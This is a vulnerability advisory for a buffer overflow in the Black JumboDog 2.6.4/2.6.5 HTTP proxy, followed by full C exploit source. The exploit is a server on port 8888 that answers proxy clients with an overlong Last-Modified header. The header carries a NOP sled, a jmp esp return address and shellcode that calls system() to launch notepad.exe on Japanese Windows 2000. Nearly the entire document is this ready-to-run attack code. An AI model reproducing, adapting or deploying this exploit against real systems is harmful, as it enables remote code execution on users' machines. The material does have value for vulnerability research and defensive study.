SapporoWorks Black JumboDog 2.6.4/2.6.5 HTTP Proxy Buffer Overflow Vulnerability

                                                source: http://www.securityfocus.com/bid/3858/info

Black JumboDog 2.6.4 and 2.6.5 HTTP proxy is vulnerable to an exploitable buffer overflow. The buffer overflow can be exploited by sending excessively long "expires", "if-modified-since", and "Last_Modified" strings containing executable code. A client must be able to use the Black JumboDog HTTP proxy function. Black JumboDog also has mail proxy functions and this buffer overflow can be exploited with HTML mail. This is a japanese software product.

/*=========================================================================
   Black JumboDog 2.6.4/2.6.5 Exploit for Windows 2000(J) Professional
   The Shadow Penguin Security (http://www.shadowpenguin.org)
   Written by UNYUN ([email protected])
  =========================================================================
*/
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>

#define RESP \
"HTTP/1.1 200 OK\r\n"\
"Date: Sat, 1 Jan 2002 00:00:00 GMT\r\n"\
"Server: Apache/1.3.17 (Unix)\r\n"\
"Last-Modified: %s\r\n"

#define SERVICE_PORT        8888
#define MAXBUF              3000
#define NOP                 0x90
#define RETADR              1076
#define CODEOFS             1100
#define JMPESP_ADR          0x77e0af64
#define OFS_LoadLibrary     18
#define OFS_GetProcAddress  30
#define ADDR_LoadLibrary    0x77e5a254  
#define ADDR_GetProcAddress 0x77e59ac1

static unsigned char egg[512]={
    0xEB,0x2A,0x5B,0x33,0xC9,0x4B,0x88,0x4B,
    0x0B,0x43,0x88,0x4B,0x11,0x88,0x4B,0x1D,
    0x53,0xB8,0x73,0x72,0xE5,0x77,0xFF,0xD0,
    0x83,0xC3,0x0B,0x53,0x50,0xB8,0x31,0x70,
    0xE5,0x77,0xFF,0xD0,0x83,0xC3,0x07,0x53,
    0xFF,0xD0,0xEB,0xFE,0xE8,0xD1,0xFF,0xFF,
    0xFF,0x6D,0x73,0x76,0x63,0x72,0x74,0x2E,
    0x64,0x6C,0x6C,0x2E,0x73,0x79,0x73,0x74,
    0x65,0x6D,0x2E,0x6E,0x6F,0x74,0x65,0x70,
    0x61,0x64,0x2E,0x65,0x78,0x65,0x2E,0x00
};

void valset(char *buf,unsigned int val)
{
    *buf=val&0xff;
    *(buf+1)=(val>>8)&0xff;
    *(buf+2)=(val>>16)&0xff;
    *(buf+3)=(val>>24)&0xff;
}

main()
{
    FILE                *fp;
    static char         buf[MAXBUF];
    static char         pkt[MAXBUF*2];
    char                tmp[512];
    int                 sock,sock_accept;
    int                 optval;
    struct sockaddr_in  addr;

    memset(buf,NOP,MAXBUF);
    valset(buf+RETADR,JMPESP_ADR);
    valset(egg+OFS_LoadLibrary,ADDR_LoadLibrary);
    valset(egg+OFS_GetProcAddress,ADDR_GetProcAddress);
    strncpy(buf+CODEOFS,egg,strlen(egg));
    buf[MAXBUF-1]=0;
    sprintf(pkt,RESP,buf);

    if ((sock=socket(AF_INET,SOCK_STREAM,0))==-1){
        perror("socket");
        exit(1);
    }

    optval=1;
    setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,(void *)&optval,sizeof(optval));
    addr.sin_family      = AF_INET;
    addr.sin_port        = htons(SERVICE_PORT); 
    addr.sin_addr.s_addr = INADDR_ANY;
    if ((bind(sock,(struct sockaddr *)&addr,sizeof(addr)))==-1){
        perror("bind");
        close(sock);
        exit(1);
    }
    if (listen(sock,1)==-1){
        perror("listen");
        close(sock);
        exit(1);
    }
    for (;;){
        if ((sock_accept=accept(sock,NULL,NULL))==-1){
            perror("accept");
            close(sock);
            exit(1);
        }
        if (recv(sock_accept,tmp,sizeof(tmp),0)<=0){
            close(sock_accept);
            continue;
        }
        send(sock_accept,pkt,strlen(pkt),0);
        close(sock_accept);
    }
}